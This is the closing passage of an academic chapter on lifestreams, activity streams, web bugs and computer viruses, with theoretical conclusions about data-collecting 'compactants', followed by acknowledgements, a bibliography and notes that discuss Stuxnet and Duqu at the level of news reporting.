&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman 1997, Gelernter 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A ''lifestream'' is a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries (Freeman 2000). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was certainly one of the first people to collect their data systematically as he explains he started in 1989: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them (Wolfram 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
This way of collecting and sending data has been accelerated by the use of mobile ‘apps’, which are small relatively contained applications that usually perform a single specific function. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied (ActivityStreamsWG 2011, original emphasis).&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that enable the data transfers. Whilst also becoming the vectors that carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Harraway 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as “future self continuity” (Tugend 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Evenso, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
AP (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBSNews (2010)Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
**&amp;amp;nbsp;**&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) Chartbeat: http://static.chartbeat.com/js/chartbeat.js &amp;amp;nbsp;; (2) Google Analytics: http://www.google-analytics.com/ga.js &amp;amp;nbsp;; (3) Omniture: http://o.aolcdn.com/omniunih.js &amp;amp;nbsp;; (4) Advertising.com: http://o.aolcdn.com/ads/adsWrapper.js &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 [n]](http://www.president.ir/en/9172) (see Peterson 2012) &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: “Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former” (Gross 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they** “**are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language,&amp;quot; (Evans 2012) &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: “It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)” (Wolfram 2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/), http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: “Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on” (Sense 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
</feed>